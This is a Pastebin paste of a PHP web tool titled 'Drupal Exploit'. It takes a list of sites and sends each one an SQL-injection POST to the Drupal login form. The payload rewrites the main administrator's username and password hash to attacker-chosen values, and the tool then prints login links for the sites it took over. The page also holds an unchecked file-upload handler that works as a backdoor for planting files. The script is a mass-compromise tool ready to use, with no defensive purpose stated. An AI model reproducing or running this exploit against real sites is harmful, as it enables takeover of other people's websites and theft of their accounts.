Advertisement
AZZATSSINS_CYBERSERK

Drupal Exploit

Jun 29th, 2016
444
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.99 KB | None | 0 0
  1.  <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploit</title>
  5.     <style type="text/css">
  6.     .mymargin{
  7.         margin-top:30px;
  8.         font-family: monospace;
  9.     }
  10.     body, html {
  11.         background-color:black;
  12.         text-align: center;
  13.         color: #008000;
  14.         margin: 10px auto;
  15.     }
  16.     a {
  17.     color: lime;
  18.     text-decoration: none;
  19. }
  20.     </style>
  21. </head>
  22. <body>
  23. <center>
  24.     <div class="mymargin">
  25.         <center>
  26.             <form method="POST" action="">
  27.         <font color='#008000'>WebSite :</font> <br>
  28.         <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
  29.         <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
  30.     </form>
  31.     <br>
  32. <?php
  33. error_reporting(0);
  34. $submit = $_POST['submit'];
  35. $url = explode("\r\n", $_POST['url']);
  36. if($submit) {
  37.     foreach($url as $sites) {
  38.     $log = "/user/login";
  39.     $holako = "/?q=user";
  40.     $post_data = "name[0;update users set name %3D 'azzatssins' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  41.     $params = array(
  42.         'http' => array(
  43.         'method' => 'POST',
  44.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  45.         'content' => $post_data
  46.         )
  47.     );
  48.     $ctx = stream_context_create($params);
  49.     $data = file_get_contents($sites . '/user/login/', null, $ctx);
  50.     echo "<u>Testing user/login</u><br>";
  51.     if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  52.         echo "Scanning: <font color=lime>$sites</font><br>";
  53.         echo "Status: Successfully Xploited!<br>";
  54.         echo "Data=> user: <font color='#ff3'>azzatssins</font> | pass: <font color='#ff3'>admin</font><br>";
  55.         echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  56.     } else {
  57.         echo "Scanning: <font color=lime>$sites</font><br>";
  58.         echo "Status: <font color=red>Not Xploited!</font><br><br>";
  59.     }
  60. }
  61. }
  62. if($submit) {
  63.     foreach($url as $sites) {
  64.     $post_data = "name[0;update users set name %3D 'azzatssins' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  65.     $params = array(
  66.         'http' => array(
  67.         'method' => 'POST',
  68.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  69.         'content' => $post_data
  70.         )
  71.     );
  72.     $ctx = stream_context_create($params);
  73.     $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
  74.     echo '<u>Testing at Index</u><br>';
  75.     if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  76.         echo "Scanning: <font color=lime>$sites</font><br>";
  77.         echo "Status: Successfully Xploited!<br>";
  78.         echo "Data => user: <font color='#ff3'>azzatssins</font> | pass: <font color='#ff3'>admin</font><br>";
  79.         echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  80.     } else {
  81.         echo "Scanning: <font color=lime>$sites</font><br>";
  82.         echo "Status: <font color=red>Not Xploited!</font><br><br>";
  83.     }
  84. }
  85. }
  86. ?>
  87.     </div>
  88. <?php
  89.  
  90. $Drupal  = $_POST['Drupal'];
  91.  
  92.  
  93. if($Drupal == 'Drupal') {
  94.  
  95. $filename = $_FILES['file']['name'];
  96. $filetmp  = $_FILES['file']['tmp_name'];
  97.  
  98. echo "<form method='POST' enctype='multipart/form-data'>
  99.   <input type='file'name='file' />
  100.   <input type='submit' value='go' />
  101.  
  102. </form>";
  103. move_uploaded_file($filetmp,$filename);
  104. }
  105. ?>
  106. </body>
  107. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement